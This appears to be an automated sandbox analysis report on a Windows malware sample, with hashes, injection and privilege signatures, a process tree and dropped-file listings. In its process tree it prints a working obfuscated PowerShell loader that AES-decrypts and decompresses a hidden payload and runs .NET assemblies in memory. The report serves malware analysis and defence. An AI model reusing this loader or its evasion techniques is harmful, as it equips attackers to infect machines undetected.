0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9ed

Analysis

max time kernel
56s
max time network
101s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
02/08/2023, 16:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe
Size

591KB
MD5

07f93a3fafb4bdfc8ee14e75d3a067ed
SHA1

fe949c7d2a6e7fdbfe80f88b77ac121ff78473e0
SHA256

0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9ed
SHA512

cb415168819bf56f797a20c2d081239d37f6440a480b5807ae425afd2261cf6079318f4b176282f6215b6a55f2b11c33355dbc553cddbdd31dbd6c6799b695f2
SSDEEP

12288:d8Ax7GrNHgsg5vcj61pn5P2uFe7IGxdjI73Jxge4WFNMiyxlwn:qAx7Gxe5vQcp8hVxE3jge4uml2

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1924	gtwwhbs.bat.scr

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4992 set thread context of 4520	4992	0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe	90

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4992	0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe
4992	0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4992	0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe
Token: SeDebugPrivilege	4520	MSBuild.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 4992 wrote to memory of 4520	4992	0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe	90
PID 4992 wrote to memory of 4520	4992	0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe	90
PID 4992 wrote to memory of 4520	4992	0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe	90
PID 4992 wrote to memory of 4520	4992	0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe	90
PID 4992 wrote to memory of 4520	4992	0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe	90
PID 4992 wrote to memory of 4520	4992	0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe	90
PID 888 wrote to memory of 4268	888	cmd.exe	98
PID 888 wrote to memory of 4268	888	cmd.exe	98
PID 4268 wrote to memory of 1924	4268	cmd.exe	100
PID 4268 wrote to memory of 1924	4268	cmd.exe	100

C:\Users\Admin\AppData\Local\Temp\0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe
"C:\Users\Admin\AppData\Local\Temp\0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4992
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4520

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\gtwwhbs.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\gtwwhbs.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4268
- - C:\Users\Admin\AppData\Local\Temp\gtwwhbs.bat.scr
    "C:\Users\Admin\AppData\Local\Temp\gtwwhbs.bat.scr" -w hidden -c $IoHI='GbhTxebhTxtCubhTxrrbhTxentPbhTxrbhTxocbhTxessbhTx'.Replace('bhTx', '');$YThx='RbhTxeadbhTxLbhTxinebhTxsbhTx'.Replace('bhTx', '');$BZdR='SplbhTxitbhTx'.Replace('bhTx', '');$wkMM='LoabhTxdbhTx'.Replace('bhTx', '');$Schx='InbhTxvbhTxokbhTxebhTx'.Replace('bhTx', '');$sOYv='MbhTxaibhTxnbhTxMobhTxdbhTxubhTxlebhTx'.Replace('bhTx', '');$GewW='EntrbhTxyPbhTxoinbhTxtbhTx'.Replace('bhTx', '');$RDDF='ChabhTxngbhTxebhTxExtbhTxenbhTxsiobhTxnbhTx'.Replace('bhTx', '');$BRFZ='ElbhTxebhTxmenbhTxtbhTxAbhTxtbhTx'.Replace('bhTx', '');$xRuw='TrabhTxnbhTxsfbhTxormbhTxFinbhTxalBbhTxlobhTxckbhTx'.Replace('bhTx', '');$lEbe='FrbhTxombhTxBasbhTxe64bhTxSbhTxtbhTxrinbhTxgbhTx'.Replace('bhTx', '');$DxEM='CrbhTxeatebhTxDebhTxcrbhTxypbhTxtorbhTx'.Replace('bhTx', '');function sTHNF($KOZoK){$uSSaq=[System.Security.Cryptography.Aes]::Create();$uSSaq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uSSaq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uSSaq.Key=[System.Convert]::$lEbe('l1mGzzW6VwnSMBDn3abAktdzHpgQ2u2J5US922yw3C4=');$uSSaq.IV=[System.Convert]::$lEbe('PRGOu0v/8IP/KoS6c9wTWg==');$fXZmM=$uSSaq.$DxEM();$TBSvx=$fXZmM.$xRuw($KOZoK,0,$KOZoK.Length);$fXZmM.Dispose();$uSSaq.Dispose();$TBSvx;}function UbSiJ($KOZoK){$sixLe=New-Object System.IO.MemoryStream(,$KOZoK);$QrGpd=New-Object System.IO.MemoryStream;$Peavr=New-Object System.IO.Compression.GZipStream($sixLe,[IO.Compression.CompressionMode]::Decompress);$Peavr.CopyTo($QrGpd);$Peavr.Dispose();$sixLe.Dispose();$QrGpd.Dispose();$QrGpd.ToArray();}$EWpTE=[System.Linq.Enumerable]::$BRFZ([System.IO.File]::$YThx([System.IO.Path]::$RDDF([System.Diagnostics.Process]::$IoHI().$sOYv.FileName, $null)), 1);$GVKYS=$EWpTE.Substring(2).$BZdR(':');$swpDj=UbSiJ (sTHNF ([Convert]::$lEbe($GVKYS[0])));$nvyDR=UbSiJ (sTHNF ([Convert]::$lEbe($GVKYS[1])));[System.Reflection.Assembly]::$wkMM([byte[]]$nvyDR).$GewW.$Schx($null,$null);[System.Reflection.Assembly]::$wkMM([byte[]]$swpDj).$GewW.$Schx($null,$null);
    3⤵
    - Executes dropped EXE
    PID:1924

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\gtwwhbs.bat

Filesize
3.1MB

MD5
1551e43ba5cc0468ffa4d54d29870ac0

SHA1
2c61b5443a387146b2bc91432e433eddd885643b

SHA256
670804e6feb3e0fe86cff07d3ce364ba57842eac02a4c1248989b7a9c1b97de9

SHA512
2fac29db81f334ae08944009a82f9c3d70bf4e0e291b826aaaa8f822e0f80962ab9dc75d97515d55ad95f6bf4903619e2484ff3e4799bd2ac9cc4bfdaf9b550f

Download Submit
C:\Users\Admin\AppData\Local\Temp\gtwwhbs.bat.scr

Filesize
192KB

MD5
d64253fa665ae070d95e8b9438ab2697

SHA1
ae8930de4f5dfeb31246043d4cf1ed9814cc4db4

SHA256
5ff7d7573a6a1cfa04a9191c1cb4626b0d200b9077258557fdc7ea06c87bf743

SHA512
cd9fa8738caadd34c118de0faad66c4470f49673bc23b023f24a6e1aaa7869a91f9fe9e849c411331fe7352df38dbc100d715d35fef64cff5c4f45b05d3c6468

Download Submit
memory/4520-2346-0x000002A47B680000-0x000002A47B690000-memory.dmp

Filesize
64KB

Download
memory/4520-4557-0x000002A47B680000-0x000002A47B690000-memory.dmp

Filesize
64KB

Download
memory/4520-4081-0x00007FFBEBAC0000-0x00007FFBEC581000-memory.dmp

Filesize
10.8MB

Download
memory/4520-3902-0x000002A47B680000-0x000002A47B690000-memory.dmp

Filesize
64KB

Download
memory/4520-2348-0x00007FFBEBAC0000-0x00007FFBEC581000-memory.dmp

Filesize
10.8MB

Download
memory/4992-177-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-185-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-147-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-149-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-151-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-153-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-155-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-157-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-161-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-159-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-163-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-165-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-167-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-169-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-171-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-173-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-175-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-133-0x0000000000AC0000-0x0000000000B58000-memory.dmp

Filesize
608KB

Download
memory/4992-179-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-181-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-183-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-145-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-187-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-189-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-191-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-193-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-195-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-197-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-199-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-1000-0x00007FFBEBAC0000-0x00007FFBEC581000-memory.dmp

Filesize
10.8MB

Download
memory/4992-1235-0x000000001C730000-0x000000001C740000-memory.dmp

Filesize
64KB

Download
memory/4992-2342-0x000000001C730000-0x000000001C740000-memory.dmp

Filesize
64KB

Download
memory/4992-2344-0x000000001C730000-0x000000001C740000-memory.dmp

Filesize
64KB

Download
memory/4992-2347-0x00007FFBEBAC0000-0x00007FFBEC581000-memory.dmp

Filesize
10.8MB

Download
memory/4992-143-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-141-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-139-0x000000001C730000-0x000000001C740000-memory.dmp

Filesize
64KB

Download
memory/4992-138-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-137-0x00007FFBEBAC0000-0x00007FFBEC581000-memory.dmp

Filesize
10.8MB

Download
memory/4992-134-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download
memory/4992-135-0x000000001C570000-0x000000001C651000-memory.dmp

Filesize
900KB

Download